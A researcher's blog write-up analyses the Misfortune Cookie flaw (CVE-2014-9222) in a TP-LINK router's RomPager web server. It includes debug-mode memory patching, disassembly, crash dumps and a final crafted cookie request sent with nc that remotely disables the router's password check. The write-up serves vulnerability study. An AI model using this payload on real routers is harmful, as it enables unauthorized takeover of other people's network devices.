Misfortune Cookie (CVE-2014-9222) Demystified

The misfortune cookie vulnerability has been around for a while but still lacking an analysis which illustrate the techinical details of the vulnerability in public. Those so called “misfortune cookie scanner” are just a simple script to retrieve the return string at path “/Allegro” as shown below,

cawan$ curl 192.168.1.1/Allegro
<html>
    <head>
        <title>Allegro Copyright</title>
    </head>
    <body>
        RomPager Advanced Version 4.07<br />
        (C) 1995 - 2002 Allegro Software Development Corporation
    </body>
</html>

Nothing special… So, let us dig further now. I am using TD-8901N with firmware version “TD-W8901N v1_111211”. After open the housing of the router, the Tx and Rx are labeled on the PCB to show the UART connection are available to be connected for debugging purposes. By using an oscilloscope to probe the Tx in bootup process, it shown the baudrate is 115200 in 3.3v. Now, attach an USB-to-UART onto it and bootup the router again. Well, we can see the boot log in pretty detail. However, the command interface is really restricted, nothing can make use there, as shown below,

Copyright (c) 2001 - 2012 TP-LINK TECHNOLOGIES CO., LTD.
TP-LINK>
TP-LINK> ?
Valid commands are:
sys             exit            ether           wan             
etherdbg        tcephydbg       ip              bridge           
dot1q           pktqos          show            set             
lan                                                             
TP-LINK>

Anyway, we can stop the boot process at the zynos bootloader, as shown below,

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870 
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18 

Press any key to enter debug mode within 3 seconds.
.......
Enter Debug Mode

In debug mode, we can use zynos commands which is AT command alike, as shown below,

Enter Debug Mode
athe
======= Debug Command Listing =======
AT          just answer OK
ATHE          print help
ATBAx         change baudrate. 1:38.4k, 2:19.2k, 3:9.6k 4:57.6k 5:115.2k
ATENx,(y)     set BootExtension Debug Flag (y=password)
ATSE          show the seed of password generator
ATTI(h,m,s)   change system time to hour:min:sec or show current time
ATDA(y,m,d)   change system date to year/month/day or show current date
ATDS          dump RAS stack
ATDT          dump Boot Module Common Area
ATDUx,y       dump memory contents from address x for length y
ATRBx         display the  8-bit value of address x
ATRWx         display the 16-bit value of address x
ATRLx         display the 32-bit value of address x
ATGO(x)       run program at addr x or boot router
ATGR          boot router
ATGT          run Hardware Test Program
ATRTw,x,y(,z) RAM test level w, from address x to y (z iterations)
ATSH          dump manufacturer related data in ROM
ATDOx,y       download from address x for length y to PC via XMODEM
ATTD          download router configuration to PC via XMODEM
ATUR          upload router firmware to flash ROM

< press any key to continue >

According to Piotrbania [1], there is a “god mode” which should be triggered to enable hidden commands. The hidden commands will allow us to view memory mapping and to edit memory contents, as shown below,

ATEN1, A847D6B1
OK
athe
======= Debug Command Listing =======
AT          just answer OK
ATHE          print help
ATBAx         change baudrate. 1:38.4k, 2:19.2k, 3:9.6k 4:57.6k 5:115.2k
ATENx,(y)     set BootExtension Debug Flag (y=password)
ATSE          show the seed of password generator
ATTI(h,m,s)   change system time to hour:min:sec or show current time
ATDA(y,m,d)   change system date to year/month/day or show current date
ATDS          dump RAS stack
ATDT          dump Boot Module Common Area
ATDUx,y       dump memory contents from address x for length y
ATWBx,y       write address x with  8-bit value y
ATWWx,y       write address x with 16-bit value y
ATWLx,y       write address x with 32-bit value y
ATRBx         display the  8-bit value of address x
ATRWx         display the 16-bit value of address x
ATRLx         display the 32-bit value of address x
ATGO(x)       run program at addr x or boot router
ATGR          boot router
ATGT          run Hardware Test Program
AT%Tx         Enable Hardware Test Program at boot up
ATBTx         block0 write enable (1=enable, other=disable)

< press any key to continue >
ATRTw,x,y(,z) RAM test level w, from address x to y (z iterations)
ATWEa(,b,c,d) write MAC addr, Country code, EngDbgFlag, FeatureBit to flash ROM
ATCUx         write Country code to flash ROM
ATCB          copy from FLASH ROM to working buffer
ATCL          clear working buffer
ATSB          save working buffer to FLASH ROM
ATBU          dump manufacturer related data in working buffer
ATSH          dump manufacturer related data in ROM
ATWMx         set low 6 digits MAC address in working buffer
ATMHx         set hight 6 digits MAC address in working buffer
ATBS          show the bootbase seed of password generator
ATLBx         xmodem upload bootbase,x is password
ATSMx         set 6 digits MAC address in working buffer
ATCOx         set country code in working buffer
ATFLx         set EngDebugFlag in working buffer
ATSTx         set ROMRAS address in working buffer
ATSYx         set system type in working buffer
ATVDx         set vendor name in working buffer
ATPNx         set product name in working buffer
ATFEx,y,...   set feature bits in working buffer
ATMP          check & dump memMapTab
ATDOx,y       download from address x for length y to PC via XMODEM

< press any key to continue >
ATTD          download router configuration to PC via XMODEM
ATUPx,y       upload to RAM address x for length y from PC via XMODEM
ATUR          upload router firmware to flash ROM
ATDC          hardware version check disable during uploading firmware
ATLC          upload router configuration file to flash ROM
ATUXx(,y)     xmodem upload from flash block x to y
ATERx,y       erase flash rom from block x to y
ATWFx,y,z     copy data from addr x to flash addr y, length z
ATXSx         xmodem select: x=0: CRC mode(default); x=1: checksum mode
ATLD          Upload Configuration File and Default ROM File to Flash
ATBR              Reset to default Romfile
ATCD          Convert Running ROM File to Default ROM File into Flash

OK
atmp
                                                                                                      
ROMIO image start at bfc30000

  1: HTPCode(RAMCODE), start=80048000, len=E0000
  2: RasCode(RAMCODE), start=80048000, len=6E0000
$ROM Section:
  3: BootBas(ROMIMG), start=bfc28000, len=4000
  4: DbgArea(ROMIMG), start=bfc2c000, len=2000
  5: RomDir2(ROMDIR), start=bfc2e000, len=2000
  6: BootExt(ROMIMG), start=bfc30030, len=13FD0
  7: MemMapT(ROMMAP), start=bfc44000, len=C00
  8: HTPCode(ROMBIN), start=bfc44c00, len=8000
     (Compressed)
     Version: HTP_TC V 0.05, start: bfc44c30
     Length: 10488, Checksum: CB32
     Compressed Length: 41CF, Checksum: D5A5
  9: termcap(ROMIMG), start=bfc4cc00, len=400
 10: RomDefa(ROMIMG), start=bfc4d000, len=2000
 11: LedDefi(ROMIMG), start=bfc4f000, len=400
 12: LogoImg(ROMIMG), start=bfc4f400, len=2000
 13: LogoImg2(ROMIMG), start=bfc51400, len=2000
 14: StrImag(ROMIMG), start=bfc53400, len=32000
 15: Rt11nE2p(ROMIMG), start=bfc85400, len=400
 16: fdata(ROMBIN), start=bfc85800, len=10000
     (Compressed)
     Version: FDATA, start: bfc85830
     Length: A94C, Checksum: DCEE
     Compressed Length: 1D79, Checksum: 01BB
 17: RasCode(ROMBIN), start=bfc95800, len=192800
     (Compressed)
     Version: ADSL ATU-R, start: bfc95830
     Length: 3E7004, Checksum: 3336
     Compressed Length: 122D57, Checksum: 3612

So, we can make a summary here,

1) The very first execution is started from 0xbfc00000 To verify this, we can try this,

atgo bfc00000

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870 
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18 

Press any key to enter debug mode within 3 seconds.
.........
Enter Debug Mode

2) The zynos bootloader is started from 0x80000000. It will be unpacked and decompressed in the previous stage before getting executed. It is not exactly the 14C33 image of ras as shown below,

cawan$ binwalk ras

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
61315         0xEF83          ZyXEL rom-0 configuration block, name: "dbgarea", ...
61564         0xF07C          ZyXEL rom-0 configuration block, name: "dbgarea", ...
85043         0x14C33         LZMA compressed data, properties: 0x5D ...
118036        0x1CD14         Unix path: /usr/share/tabset/vt100:\
118804        0x1D014         ZyXEL rom-0 configuration block, name: "spt.dat", ...
118824        0x1D028         ZyXEL rom-0 configuration block, name: "autoexec.net", ...
128002        0x1F402         GIF image data, version "89a", 200 x 50
136194        0x21402         GIF image data, version "89a", 560 x 50
244317        0x3BA5D         Neighborly text, "neighbor of your ADSL Router that ...
281224        0x44A88         Unix path: /I/J/L/M
328173        0x501ED         Copyright string: "Copyright (c) 2001 - 2012 TP-LINK ...
350259        0x55833         LZMA compressed data, properties: 0x5D, ...
415795        0x65833         LZMA compressed data, properties: 0x5D, ...

So, it should be dumped from memory by using atdo command.

3) The rtos which is threadx together with vulnerable allegro rompager is started from 0x80020000. Again, it is unpacked and decompressed in the previous stage before getting executed. Anyway, it is exactly the 65883 image being extracted from the firmware, as shown above. Besides, the processor architecture can be detected as below,

cawan$ binwalk --disasm --minsn=100 65833

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             MIPS executable code, 32/64-bit, big endian, ...

So, the 65883 is ready to be loaded in ida pro with 0x80020000 as base address and MIPS big endian as processor architecture. According to Lior Oppenheim and Shahar Tal [2], the vulnerability is due to the mis-interpretation of “Cookie: C” header to the rompager webserver. While doing this,

cawan$ curl --header 'Cookie: C' 192.168.1.1

will cause the router get into something wrong and reboot immediately. At the UART port, the “Kernel Panic” alike error dump is shown accordingly, as below.

TP-LINK>
TLB refill exception occured!
EPC= 0x8010E5D8
SR= 0x10000003
CR= 0xC080500C
$RA= 0x00000000
Bad Virtual Address = 0x00000000
UTLB_TLBS ..\core\sys_isr.c:267 sysreset()


        $r0= 0x00000000 $at= 0x80350000 $v0= 0x00000000 $v1= 0x00000001
        $a0= 0x00000001 $a1= 0x805D7AF8 $a2= 0xFFFFFFFF $a3= 0x00000000
        $t0= 0x8001FF80 $t1= 0xFFFFFFFE $t2= 0x804A8F38 $t3= 0x804A9E47
        $t4= 0x804A9460 $t5= 0x804A8A60 $t6= 0x804A9D00 $t7= 0x00000040
        $s0= 0x804A8A60 $s1= 0x8040C114 $s2= 0x805E2BC8 $s3= 0x80042A70
        $s4= 0x00000001 $s5= 0x8000007C $s6= 0x8040E5FC $s7= 0x00000000
        $t8= 0x804A9E48 $t9= 0x00000000 $k0= 0x00000000 $k1= 0x8000007C
        $gp= 0x8040F004 $sp= 0x805E2B60 $fp= 0x805E2BC8 $ra= 0x8003A3D0


          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

805e2bc8: 80 5e 2b f8 80 04 2a 70 80 4e d5 ba 00 00 00 01     .^+...*p.N......
805e2bd8: 80 4e d5 ba 00 00 00 00 80 40 f8 ac 80 48 4e 29     .N.......@...HN)
805e2be8: 80 55 54 4c 42 5f 54 4c 42 53 00 ba 80 41 34 0c     .UTLB_TLBS...A4.
805e2bf8: 80 5e 2c 18 80 10 e5 e0 80 42 64 dc 80 4e d5 b9     .^,......Bd..N..
805e2c08: 80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0     .@.......@......
805e2c18: 80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00     .^,0...8.@......
805e2c28: 00 00 00 00 80 16 c4 28 80 5e 2c 40 80 10 ec 28     .......(.^,@...(
...
...
805e2f68: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2f78: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2f88: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2f98: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2fa8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2fb8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2fc8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................

 current task   = httpd
 dump task      = network
 tx_stack_ptr   = 0x805D5990
 tx_stack_start = 0x805D3AF0
 tx_stack_end   = 0x805D5AEF
 tx_stack_size  = 0x00002000
 tx_run_count   = 0x00000220
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

805d5990: 00 00 00 00 80 5d 5a 70 80 44 2b f8 80 4a db 98     .....]Zp.D+..J..
805d59a0: 80 44 2c 8c 80 44 2c 90 80 44 2c 7c 80 44 2c 94     .D,..D,..D,|.D,.
805d59b0: 80 4a db 98 10 00 00 01 00 00 00 0a 00 00 00 00     .J..............
805d59c0: 80 1e cc ac 10 00 00 01 00 00 00 00 80 51 47 98     .............QG.
805d59d0: 00 00 00 00 00 00 05 dc 00 00 00 14 c0 a8 01 90     ................
805d59e0: 80 5d 5a 90 80 07 20 c8 80 45 23 34 00 00 00 01     .]Z... ..E#4....
805d59f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805d5a00: 00 00 00 00 80 4d ac 88 80 52 90 38 00 00 00 01     .....M...R.8....
805d5a10: c0 a8 01 90 00 00 00 01 80 5d 5a 90 80 51 47 98     .........]Z..QG.
805d5a20: 80 45 23 34 00 00 00 14 00 00 00 00 00 00 00 00     .E#4............
805d5a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805d5a40: 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 01 01     ................
805d5a50: 10 00 00 01 80 4a db 98 00 00 00 00 00 00 00 00     .....J..........
...
...
Reserve for Print when Crash

Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!

Well, the error is occured at httpd process and the program counter is at 0x8010E5D8. Let’s check the details in ida pro.

ROM:8010E5B0 loc_8010E5B0:                            # CODE XREF: sub_8010E574+EC j
ROM:8010E5B0                 li      $t7, 0x43        # 0x43='C'
ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
ROM:8010E5B8                 li      $a1, 0x3D
ROM:8010E5BC                 addiu   $s0, 1
ROM:8010E5C0                 move    $a0, $s0       
ROM:8010E5C4                 jal     sub_8016C340
ROM:8010E5C8                 nop
ROM:8010E5CC                 move    $a0, $s0       
ROM:8010E5D0                 move    $s1, $v0       
ROM:8010E5D4                 addiu   $s1, 1
ROM:8010E5D8                 jal     sub_801F2E74
ROM:8010E5DC                 sb      $zero, -1($s1) 
ROM:8010E5E0                 move    $a0, $s1       
ROM:8010E5E4                 jal     sub_8016CA24
ROM:8010E5E8                 move    $s3, $v0       
ROM:8010E5EC                 li      $a2, 0x28
ROM:8010E5F0                 mul     $t2, $s3, $a2   
ROM:8010E5F4                 move    $a1, $s1       
ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0   
ROM:8010E604                 addu    $a0, $t5, $t2   
ROM:8010E608                 jal     sub_8016A784
ROM:8010E60C                 sb      $zero, 0($at)
ROM:8010E610                 j       loc_8010E644   
ROM:8010E614                 addu    $s0, $s1, $s0
ROM:8010E618  # ---------------------------------------------------------------------------

Excellent, it is exactly the codes being mentioned in [2]. It seems the syntax Cxxx=yyy will be interpreted as xxx being multiplied with 0x28 at ROM:8010E5F0, and sum the result with a base address being calculated at ROM:8010E5F8, and use the new address as the destination address to copy yyy into it at ROM:8010E608. Hence, it allows us to perform an arbitrary overwrite here. On the other hand, it is possible to “unlock” the router with “sys pwauthen 0”, as shown below.

cawan$ curl 192.168.1.1
<html>
    <head>
        <title>Protected Object</title>
    </head>
    <body>
        <h1>Protected Object</h1>Username or Password error
    </body>
</html>
TP-LINK> sys pswauthen 0
Do not need password authentication for configuration!
TP-LINK>
cawan$ curl 192.168.1.1
<html>
    <head>
        <title></title>
    </head>
    <frameset border="0" frameborder="0" framespacing="0" rows="65,75,*">
        <frame marginheight="0" marginwidth="0" name="header" noresize="" src="status.html"></frame>
        <frame marginheight="0" marginwidth="0" name="navigation" noresize="" src="navigation-status.html"></frame>
        <frame marginheight="0" marginwidth="0" name="main" noresize="" src="../status/status_deviceinfo.htm"></frame>
    </frameset>
    <noframes></noframes>
</html>   

So, let us find the exact location of the “unlock” byte now. By tracing the string “Do not need password authentication for configuration!”, at instruction ROM:801F9168, it seems the “unlock” byte is located at 0x8034FF94. Now, let’s confirm it. Based on the memory dump of 0x80000000, the firmware decompression job is completed prior the address 0x80014BC0 and jump to 0x80020000 at that address with instruction “jalr $s0”. From ida pro, we know that $at is equal to 0x80020000, if we change the instruction at ROM:0x80014BC0 from “jalr $s0” to “sw $s0, -4($at)”, then once the image being decompressed, it will just copy the content of $s0 to 0x8001FFFC, and stop the boot process there. So, by reading the content at 0x8001FFFC, we can know the zynos is going to jump to 0x80020000 or somewhere else. Let’s do it.

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870 
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18 

Press any key to enter debug mode within 3 seconds.
............
Enter Debug Mode
ATEN1, A847D6B1
OK
ATWL 80014BC0, ac30fffc
OK
atgr
     (Compressed)
     Version: FDATA, start: bfc85830
     Length: A94C, Checksum: DCEE
     Compressed Length: 1D79, Checksum: 01BB
Flash data is the same!!
     (Compressed)
     Version: ADSL ATU-R, start: bfc95830
     Length: 3E7004, Checksum: 3336
     Compressed Length: 122D57, Checksum: 3612

ERROR
atrl 8001fffc
8001FFFC: 80020000

As a little reminder here, the ac30fffc is the hex of “sw $s0, -4($at)”. Now, we can confirm the base of decompressed image is located at 0x80020000. As mentioned, we know the “unlock” byte is located at 0x8034FF94, and if we change it from 1 to 0, then it suppose to work without password authentication. Let’s try it now.

atrb 8034ff94
8034FF94: 01

OK
atwb 8034ff94,0
OK
atgo 80020000

Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
initialize ch = 0, TC2105MJ, ethernet address: 14:cc:20:57:38:2a
initialize ch = 1, ethernet address: 14:cc:20:57:38:2a
Wan Channel init ........ done
Reset dmt
Check DMT version =b2 ........
Initializing ADSL F/W ........ done
ADSL HW version: b2, HCLK 140
ok

==>natTableMemoryInit
<==natTableMemoryInitANNEXAIJLM
US bitswap on,DS bitswap on
OlrON
SRAON
Testlab 32
largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
portreverse : on

input line: sysdisa
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
ble PM!
Dyingasp OFF!
dhcp address probe action is disabled
Valid Loss of power OFF!
run distributePvcFakeMac!
set try multimode number to 3 (dropmode try num 3)
Syncookie switch On!
run distributePvcFakeMac!
run distributePvcFakeMac!
run d
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
istributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
Press ENTER to continue...
cawan$ curl 192.168.1.1
<html>
    <head><title></title>
    </head>
    <frameset border="0" frameborder="0" framespacing="0" rows="65,75,*">
        <frame marginheight="0" marginwidth="0" name="header" noresize="" src="status.html"></frame>
        <frame marginheight="0" marginwidth="0" name="navigation" noresize="" src="navigation-status.html"></frame>
        <frame marginheight="0" marginwidth="0" name="main" noresize="" src="../status/status_deviceinfo.htm"></frame>
    </frameset>
    <noframes></noframes>
</html>

Excellent, it is definitely working in “unlock” mode right now. So, it is the time to exploit the vulnerability remotely. By referring the code snippet of httpd again, it seems we need to know the value of $s4 at ROM:8010E5F8 in order to calculate the destination address of write operation at ROM:8010E608. We show the code snippet of httpd again here.

ROM:8010E5B0 loc_8010E5B0:                            # CODE XREF: sub_8010E574+EC j
ROM:8010E5B0                 li      $t7, 0x43        # 0x43='C'
ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
ROM:8010E5B8                 li      $a1, 0x3D
ROM:8010E5BC                 addiu   $s0, 1
ROM:8010E5C0                 move    $a0, $s0       
ROM:8010E5C4                 jal     sub_8016C340
ROM:8010E5C8                 nop
ROM:8010E5CC                 move    $a0, $s0       
ROM:8010E5D0                 move    $s1, $v0       
ROM:8010E5D4                 addiu   $s1, 1
ROM:8010E5D8                 jal     sub_801F2E74
ROM:8010E5DC                 sb      $zero, -1($s1) 
ROM:8010E5E0                 move    $a0, $s1       
ROM:8010E5E4                 jal     sub_8016CA24
ROM:8010E5E8                 move    $s3, $v0       
ROM:8010E5EC                 li      $a2, 0x28
ROM:8010E5F0                 mul     $t2, $s3, $a2   
ROM:8010E5F4                 move    $a1, $s1       
ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28  # $s4 = ?
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0   
ROM:8010E604                 addu    $a0, $t5, $t2   
ROM:8010E608                 jal     sub_8016A784
ROM:8010E60C                 sb      $zero, 0($at)
ROM:8010E610                 j       loc_8010E644   
ROM:8010E614                 addu    $s0, $s1, $s0
ROM:8010E618  # ---------------------------------------------------------------------------

The problem right now is how to get the value of $s4 at ROM:8010E5F8 ? Simple, just copy the content of $s4 into a rarely use register such as $s7 and then trigger a “kernel panic” event immediately. Let’s do it now. We are going to change,

ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0

to

ROM:8010E5FC                 add    $s7, $s4,$zero
ROM:8010E600                 jr    $zero

and the hex of these 2 instructions are,

"add $s7, $s4,$zero"   =  0x0280b820
"jr $zero"             =  0x00000008

So, let’s get the $s4 value,

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870 
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18 

Press any key to enter debug mode within 3 seconds.
.......
Enter Debug Mode
ATEN1, A847D6B1
OK
ATWL 80014BC0, ac30fffc
OK
ATGR
     (Compressed)
     Version: FDATA, start: bfc85830
     Length: A94C, Checksum: DCEE
     Compressed Length: 1D79, Checksum: 01BB
Flash data is the same!!
     (Compressed)
     Version: ADSL ATU-R, start: bfc95830
     Length: 3E7004, Checksum: 3336
     Compressed Length: 122D57, Checksum: 3612

ERROR
ATWL 8010E5FC, 0280b820
OK
ATWL 8010E600, 00000008
OK
ATGO 80020000

Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
initialize ch = 0, TC2105MJ, ethernet address: 14:cc:20:57:38:2a
initialize ch = 1, ethernet address: 14:cc:20:57:38:2a
Wan Channel init ........ done
Reset dmt
Check DMT version =b2 ........
Initializing ADSL F/W ........ done
ADSL HW version: b2, HCLK 140
ok

==>natTableMemoryInit
<==natTableMemoryInitANNEXAIJLM
US bitswap on,DS bitswap on
OlrON
SRAON
Testlab 32
largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
portreverse : on

input line: sysdisa
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
ble PM!
Dyingasp OFF!
dhcp address probe action is disabled
Valid Loss of power OFF!
run distributePvcFakeMac!
set try multimode number to 3 (dropmode try num 3)
Syncookie switch On!
run distributePvcFakeMac!
run distributePvcFakeMac!
run d
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
istributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
Press ENTER to continue...

Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!

Well, simply issue a cookie to the router now, and it should “kernel panic” immediately.

cawan$ curl --header 'Cookie: C9=9' 192.168.1.1 

At UART port, we can see this immediately, :)

TLB refill exception occured!
EPC= 0x00000000
SR= 0x10000003
CR= 0x50805808
$RA= 0x80020000
Bad Virtual Address = 0x00000000
UTLB_TLBL ..\core\sys_isr.c:267 sysreset()


        $r0= 0x00000000 $at= 0x80350000 $v0= 0x00000000 $v1= 0x00000001
        $a0= 0x00000001 $a1= 0x805D7AF8 $a2= 0xFFFFFFFF $a3= 0x00000000
        $t0= 0x8001FF80 $t1= 0xFFFFFFFE $t2= 0x804A8F38 $t3= 0x804A9E47
        $t4= 0x804A9460 $t5= 0x804A8A60 $t6= 0x804A9D00 $t7= 0x00000040
        $s0= 0x804A8A60 $s1= 0x8040C114 $s2= 0x805E2BC8 $s3= 0x80042A70
        $s4= 0x00000001 $s5= 0x8000007C $s6= 0x8040E5FC $s7= 0x8040F8AC
        $t8= 0x804A9E48 $t9= 0x00000000 $k0= 0x00000000 $k1= 0x8000007C
        $gp= 0x8040F004 $sp= 0x805E2B60 $fp= 0x805E2BC8 $ra= 0x8003A3D0


          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

805e2bc8: 80 5e 2b f8 80 04 2a 70 80 4e fe 1e 80 4e fe 20     .^+...*p.N...N.
805e2bd8: 80 4e fe 21 00 00 00 09 80 40 f8 ac 80 48 4e 29     .N.!.....@...HN)
805e2be8: 80 55 54 4c 42 5f 54 4c 42 4c 00 21 80 1f 2e 88     .UTLB_TLBL.!....
805e2bf8: 80 5e 2c 18 80 10 e5 ec 80 42 64 dc 80 4e fe 1d     .^,......Bd..N..
805e2c08: 80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0     .@.......@......
805e2c18: 80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00     .^,0...8.@......
...
...

Fine, the EPC is 0x00000000, as what we want it to be. Besides, the value of $s7 is 0x8040F8AC, which is the value of $s4 too, that we are looking for it.

Now, we know the value of $s4 is 0x8040F8AC, then the value of $t5 is 0x804163D4, which is the base address of the calculation for destination address of write operation. Since we need to overwrite 0x8034FF94 now, so

0x8034FF94 - 0x804163D4 = 0xFFF39BC0     # do this in dword
0xFFF39BC0 % 0x28 = 0                   # do this in qword
0xFFF39BC0 / 0x28 = 0x06661718           # do this in qword
0x06661718 = 107353880 (in decimal)

Because the address 0x8034FF94 is exactly at the first byte of 0x28 bytes aligned chunk, then we can only overwrite the single byte with a null character (0x00). However, if we send the specially-crafted packet to the router by using curl, it is inappropriate because curl will padding the header with 0x0d0a0d0a. Instead, it is better to send the specially-crafted packet with nc. By defining a specially-craft packet properly in a file, we can just pipe it into nc and send it over the router to “unlock” the router remotely. Let’s do it now.

cawan$ cat ./cawan_header | xxd
0000000: 4745 5420 2f20 4854 5450 2f31 2e31 0a55  GET / HTTP/1.1.U
0000010: 7365 722d 4167 656e 743a 2063 7572 6c2f  ser-Agent: curl/
0000020: 372e 3333 2e30 0a48 6f73 743a 2031 3932  7.33.0.Host: 192
0000030: 2e31 3638 2e31 2e31 0a41 6363 6570 743a  .168.1.1.Accept:
0000040: 202a 2f2a 0a43 6f6f 6b69 653a 2043 3130   */*.Cookie: C10
0000050: 3733 3533 3838 303d 000a                 7353880=..
cawan$ curl 192.168.1.1
<html>
<head>
<title>Protected Object</title></head><body>
<h1>
Protected Object</h1>
Username or Password error</body></html>
cawan$
cawan$ cat cawan_header | nc 192.168.1.1 80
cawan$
cawan$ curl 192.168.1.1
<html>
    <head><title></title>
    </head>
    <frameset border="0" frameborder="0" framespacing="0" rows="65,75,*">
        <frame marginheight="0" marginwidth="0" name="header" noresize="" src="status.html"></frame>
        <frame marginheight="0" marginwidth="0" name="navigation" noresize="" src="navigation-status.html"></frame>
        <frame marginheight="0" marginwidth="0" name="main" noresize="" src="../status/status_deviceinfo.htm"></frame>
    </frameset>
   <noframes></noframes>
</html>

Cool, we are done, and it seems the misfortune cookie vulnerability is really interesting.

References:

[1] http://piotrbania.com/all/articles/tplink_patch/

[2] http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf

PDF Version:

https://www.scribd.com/doc/256266998/Misfortune-Cookie-Demystified